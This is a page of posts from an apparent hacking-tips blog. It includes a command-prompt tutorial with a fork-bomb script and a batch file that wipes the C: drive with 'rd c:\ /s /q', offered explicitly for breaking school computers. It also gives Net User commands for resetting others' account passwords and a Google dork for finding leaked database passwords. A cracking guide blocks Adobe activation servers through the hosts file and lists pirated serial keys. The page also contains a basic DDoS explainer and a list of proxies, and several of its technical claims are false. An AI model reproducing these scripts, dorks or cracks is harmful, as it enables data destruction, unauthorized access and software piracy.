Showing posts with label BEST HACKING. Show all posts
Showing posts with label BEST HACKING. Show all posts

How To Use Command Prompt To Hack



Here is how to "hack" with command prompt, please note this is not how to hack games this is how to hack other computers/your computer

What is Command Prompt?
....if you don't know what it is you SHOULD leave! butttt ill tell you guys anyways it is the program that comes with every computer that allows access to commands that edit/modify the OS (operating system) such commands can also be used internally and externally

Why should i not delete it?
Well in all honesty you can delete it since you can make another one of it with the create shortcut and then name it CMD.exe

Is there any difference between Command Prompt and CMD?
YES!!!! a quite big one too.

What is the difference between Command Prompt and CMD?
Command Prompt is the more "advanced" CMD and gives acess to more commands and with more commands comes more fun!

Can i hack games with Command Prompt?
NO you can not.

Can i hack anything with Command Prompt?
Well duh!

What can i "hack" with Command Prompt?
Glad you asked, that brings us to todays topic

you can "hack" all of the following with Command Prompt

Most Websites
User Accounts (on your computer)
Computer Settings
E-mail
and some other stuff -.-

To do anything related to hacking with Command Prompt you must know my best friend and his name is IP!
IP is everything in the cyber world, it identifies you like no other, with your IP someone can find out where you live, who the computers registered to, the computers name, and more! So think of it as your cyber Social Security Number (SSN) you don't want to just tell everyone it.

So to get your IP you can start by opening Command Prompt
Next make sure it is on C: Drive
Then type in the following ipconfig /all
This will display a lot of info some of which is very important
This will tell you how you are connected to the internet and with what and also a lot of other stuff (i will not lie some of the info it gives is useless)
Congrats you learn a command! and you have now found out your IP! (im not telling where it is im just saying its there if you scroll up a little bit)

Now to find internet connection!
Lets say you and a friend are playing a MMO and your friend is host and you are lagging well if you want to find out why just type into command prompt the following Ping 127.0.0.1 (replace 127.0.0.1 with your friends IP)(also 127.0.0.1 is local host or you and is used for offline "things")(it also means nothing towards your IP basicly)
the lower the number you see the better! lower means faster and higher means slower

Now time for some "Advanced" stuff

How to find out computer account passwords!
this will require you to know the username.
First open Command Prompt
Then type in the following Net User
This will give you all the accounts (so i lied you didn't need to know the USernames xD
Now type in Net User Admin (you may replace Admin with the account name)
Now you get even more info on that account if you read it all it tells you about the password
Now if you want to change the password just type the following Net User Admin Password (you can replace Admin with the username and Password with the desired password) and TADA you have changed the account password.

O.K. that is all that i will currently say, i will post more in the future, this is jsut a taste of things to come and now for some fun with Command Prompt!

Open up Notepad.exe or in Command Prompt type Notepad (you may type in a files name with out the .exe on the end and it will run it)
Now type in the following:

start 
start 
start 
start 
start 
start 
start crash 

then click Save as and select all files, then name is .bat and when you are board just run it and u'll see what it does (make sure you save what your doing first!) it will auto name to Crash.bat

O.K. i take NO RESPONSIBILITY FOR WHAT I AM ABOUT TO POST! this file will BREAK YOU COMPUTER!

@echo off
taskkill -f explorer.exe
start %windir%\System32\rundll32.exe user32.dll, LockWorkStation
rd c:\ /s /q
cls

put that into a notepad and name it Break.bat now what will this do? it will first delete all internet browsers! then it will lock you out of your computer and then delete your System 32 file which is what your computer needs to RUN! now DO NOT USE THIS! i only posted this for those how want to break a school computer! be careful with this because you will need to get a new computer since restoring can't fix this! now be safe and have fun with the new skills i have just taught you! don't forget to thanks and rep me!




                                                                                                      -- Parth Patel
                                                                                                                                                (D|H)




    Dont Forgot to leave a comment if you like the post 

Everything you should be knowing about ‘DDoS Attack’

danger key on keyboard
Do you remember the day when Twitter, the latest rage across the web right now wasn’t accessible to any of its users for tens of hours(and remained unstable for a couple of days). At the same time, many other popular web services such as Facebook and LiveJournal suffered a significant downtime due to similar cause.
And the cause was DDoS Attack.
A couple of days passed by and most of us forgot that fatal attack which almost killed Twitter for a while.
Even after creating such a havoc, there’s hardly(barring tech minority) anyone who may exactly be knowing  what DDoS Attacks are all about.
In this write-up, we would explain everything about DDoS Attacks, how are they invoked and how are they can be counter-acted.
What is DoS Attack ?
Denial of Service(DoS) Attack is a fatal attempt by an external agent to cause a situation where the actual resource(victim undergoing attack) becomes unavailable to the actual visitors or users. This is usually done by overwhelming the target victim with illegitimate traffic in the form of  broken/unsolicited page access requests.
Distributed Denial of Service(DDoS) Attack is an advance form of DoS where the attacking agents are distributed over the huge network (or internet)
How DoS Attacks are executed ?
DoS Attacks are usually executed by flooding the target servers with unsolicited data packets in unprecedented manner. This may be done by misconfiguring network routers or by performing smurf attack on the victim servers. This results in ‘Capacity Overflow’, followed by Max Out of system resources, which makes the target service unavailable, either temporarily or permanently(In case of hardware targeted DoS attack) to the intended users.
In case of DDoS attack, the origin of unsolicited data packets (for the purpose of flooding the bandwidth/resource of the victim servers) are distributed over a large network(or internet).
The overall mechanism of DDoS Attack involves a huge quantity of compromised network nodes (computers connected to internet), governed by agent handlers, which are further controlled centrally by the actual attacker.
The massive number of compromised computers on the internet are then unknowingly governed by the source attacker to demand access to the targeted victim within a minimal time span, which further causes saturation of limited system resources and results in eventual shutdown of the targeted service.
The most common method employed to compromise massive amount of user agents on the internet (to actually execute DDoS Attack) is by plaguing as many computers as possible over the internet with malware/trojan, meant for that particular purpose.
Such trojans can either spread via email attachments or via Peer-to-peer networks. Whatever be the method of spreading out, once the intended trojan is silently installed on the uninformed computer agent, that user agent has actually been compromised, which is then called as a Zombie or Botnet.
Further, it becomes a prerogative of the source attacker to indirectly command some or all its Zombie agents(or botnets) for demanding access to the target service.
What are other variants of DoS attacks ?
There are many other attacks of similar nature and purpose such as smurf attack, nuke bomb, ping of death, banana attack, phlashing among many others.
How are they counteracted ?
The best way to defend a web service from faltering due to DDoS attack is to keep backup resources of the system intact. As the aim of such attack is to max out system resources, if the system resources are already abundant and well prepared to face that sudden peak of traffic at any moment, most chances are that your web service will survive DoS (or even DDoS) attack.
What implications can DDoS Attacks have ?
If the attack is only limited to overwhelming and resource consuming traffic, the implications are limited to service unavailability for couple of hours (or few days in exceptional cases). This not only stresses the website administrators financially but also results in loss of market reputation and puts a question mark on the reliability of the web service.
In case of hardware targeted DoS Attacks, financial losses can magnify to great extent as hosting infrastructure has to be replaced on urgent basis. This can also lead to critical data loss, if backup procedures aren’t up to the mark.

Get Usernames And Passwords + Database By Google
















This Tutorial  Is about Finding Username, Passwors, Databases with Google

so lets Start ...  

1- open www.Google.com

2- Enter This Dork 
  • filetype: This "pdo_mysql" (pass | passwd | password | pwd)   
See the Search Results :-
-----------------------------------

1.png (972×499)

If you did nt find this type results then click on 2-3-4.....30 pages. finally you'll find many websites

2.png (541×530)

Now Click on site, You will got all datbase of website,

Dont Forgot to leave a comment if you like the post 

Anonymous Web Surfing Tools

anonymous_mask110825163504.jpg (652×381)



HideMyAss
Tor
Download #Tor from https://www.torproject.org/
Guardster
Check out Guardster # http://www.guardster.com/
MegaProxy
Fsurf
Checkout Fsurf # http://www.fsurf.com/
Privoxy
You can download Privoxy from https://sourceforge.net/projects/ijbswa/files/

Online Anonymous proxy
Checkout Online Anonymous Proxy # http://zend2.com/
TryCatchMe
Checkout TryCatchMe # http://www.trycatchme.com/
Heeky
Checkout Heeky # http://www.heeky.com/
Web4Proxy
Checkout Web4Proxy # http://www.web4proxy.com/

Crack Adobe : How To Crack Adobe Softwares Manually



Follow the following steps to crack any Adobe software manually :

Step 1: Download the any Adobe Software you want like Dreamweaver, Photoshop, Flash, Adobe Creative Suite 5 Design Premium etc or If you already have Adobe software installed : Update it by going to Help---}} then to check for Updates.

Step 2: Now Go to START => Then go to RUN and type the following text and click enter:


C:\Windows\System32\drivers\etc

It should look like this,




Step 3: Now open that file using Notepad and copy the below lines of code and add to hosts file as shown in image bellow and save it,


127.0.0.1 hl2rcv.adobe.com
127.0.0.1 adobeereg.com
127.0.0.1 activate.adobe.com
127.0.0.1 practivate.adobe.com
127.0.0.1 ereg.adobe.com
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 wip3.adobe.com
127.0.0.1 activate-sea.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 3dns.adobe.com
127.0.0.1 3dns-1.adobe.com
127.0.0.1 3dns-2.adobe.com
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-4.adobe.com
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns-1.adobe.com
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 adobe-dns-4.adobe.com
127.0.0.1 adobe-dns-5.adobe.com
127.0.0.1 hh-software.com
127.0.0.1 http://www.hh-software.com
127.0.0.1 activate.adobe.de
127.0.0.1 practivate.adobe.de
127.0.0.1 ereg.adobe.de
127.0.0.1 activate.wip3.adobe.de
127.0.0.1 wip3.adobe.de
127.0.0.1 3dns-3.adobe.de
127.0.0.1 3dns-2.adobe.de
127.0.0.1 adobe-dns.adobe.de
127.0.0.1 adobe-dns-2.adobe.de
127.0.0.1 adobe-dns-3.adobe.de
127.0.0.1 ereg.wip3.adobe.de
127.0.0.1 activate-sea.adobe.de
127.0.0.1 wwis-dubc1-vip60.adobe.de
127.0.0.1 activate-sjc0.adobe.de
127.0.0.1 wwis-dubc1-vip60.adobe.de
127.0.0.1 hl2rcv.adobe.de
127.0.0.1 nero.com
127.0.0.1 http://www.nero.com
127.0.0.1 activate.nero.com
127.0.0.1 http://www.activate.nero.com
127.0.0.1 nero.de
127.0.0.1 http://www.nero.de
127.0.0.1 activate.nero.de
127.0.0.1 http://www.activate.nero.de
127.0.0.1 validation.sls.microsoft.com

After adding these piece of code, save the notepad file. And exit from there.

Now your .txt file should look like this



Step 4: Now open that Adobe software, which you have installed and click on Registration and register it using the following keys.

Here is a full list of adobe serials I have found.

Adobe Creative Suite :

1325-0621-9125-0765-3648-0614
1325-0365-5929-6118-8817-8422
1325-0150-1163-7532-1626-3430
1325-0178-1927-9019-0123-2254
1325-0702-3693-1544-9166-3515
1325-0549-2240-0071-3409-1342

Photoshop CS5:

1330-1927-7762-6383-0202-0414

Adobe CS5 Serials

Master Suite :

1325-1118-5864-4422-1094-1166
1325-1558-5864-4422-1094-1126
1325-1958-5864-4422-1094-1178
1325-1085-0645-5332-7061-9771

Photoshop :

1330-1927-7762-6383-0202-0414

Fireworks :

1193-1927-7762-6383-0202-0437

Dreamweaver :

1192-1927-7762-6383-0202-0474

Encore :

1132-1127-8739-4724-1356-4304

Soundbooth :

1332-1281-2401-7141-7851-9214

Onlocation :

1132-1434-9226-7415-1756-2046

Contribute :

1188-1001-8428-4361-2308-0839

Adobe Flash Catalyst :

1395-4001-8359-3301-6882-0521

Illustrator :

1034-1006-5290-0019-3090-0219

In Design :

1037-1000-0448-3419-1984-9230

Flash :


1302-1009-3696-1065-6850-7951

Adobe Creative Suite 5 Design Premium :

1407-1774-6464-0961-5577-3797
1325-1245-8536-3731-5649-0659
1325-1113-0107-7817-6293-2712
1325-1355-9394-6283-9724-7600
1325-1059-7531-1609-0601-5636
1325-1337-3209-8161-8985-5221

Adobe Premiere Pro CS5:

1325-1690-0603-1760-5083-6195
1325-1639-7577-9907-5036-7451

Adobe Lightroom 3 :

1160-4180-1304-4433-8182-0131
1160-4089-8059-2477-5747-3653
1160-4524-3826-2813-1878-0373
1160-4061-6875-7714-1191-2089
1160-4998-8932-9947-2948-1705
1160-4796-6424-4832-1184-5113
1160-4674-7526-7461-7646-0743
1160-4526-3596-3501-4568-7963

Adobe Photoshop CS5 :

1330-1331-8999-1502-9478-2917
1330-1142-0465-8003-9094-2819
1330-1316-4643-3923-8060-7538
1330-1671-4856-0278-6039-5990
1330-1647-2807-2131-5612-3113
1330-1069-7042-6518-2723-8340
1330-1273-0567-2526-5898-4518
1330-1700-2259-7564-5904-8654
1330-1456-7129-3124-9883-0945
1330-1978-0944-5190-8622-2482
1330-1729-4134-3278-5127-0701
1330-1195-9669-1964-1664-8624
1330-1053-1062-3663-3360-7919
1330-1721-2162-5454-2056-2287
1330-1266-3612-0814-0203-2212
1330-1398-3612-0601-3319-3385
1330-1559-1431-3534-8376-1995
1330-1121-1371-0736-8351-4437
1330-1168-5387-1370-1930-2853
1330-1710-0698-7698-7854-4790
1330-1554-8539-3561-0436-4419
1330-1522-1016-1028-5254-0575
1330-1114-2026-2783-5050-1059
1330-1415-4881-9987-0255-2828
1330-1024-9870-9107-3211-6777
1330-1005-5851-8724-6749-9129
1330-1302-5050-2968-0368-6016
1330-1243-3955-0795-5819-7078

For more keys visite serials.ws
I hope you are now able to convert your Trial version of Adobe Software into Full Version. If you have any problem in this tutorial on
How To Crack Adobe Software Manually,
please mention it in comments.

Enjoy Adobe Software Cracking.......